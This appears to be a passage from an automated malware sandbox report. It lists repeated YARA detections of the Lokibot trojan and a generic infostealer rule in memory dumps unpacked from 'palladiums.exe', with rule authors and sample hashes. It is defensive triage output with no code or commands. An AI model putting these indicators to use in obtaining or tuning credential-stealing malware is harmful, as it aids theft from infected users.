                Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
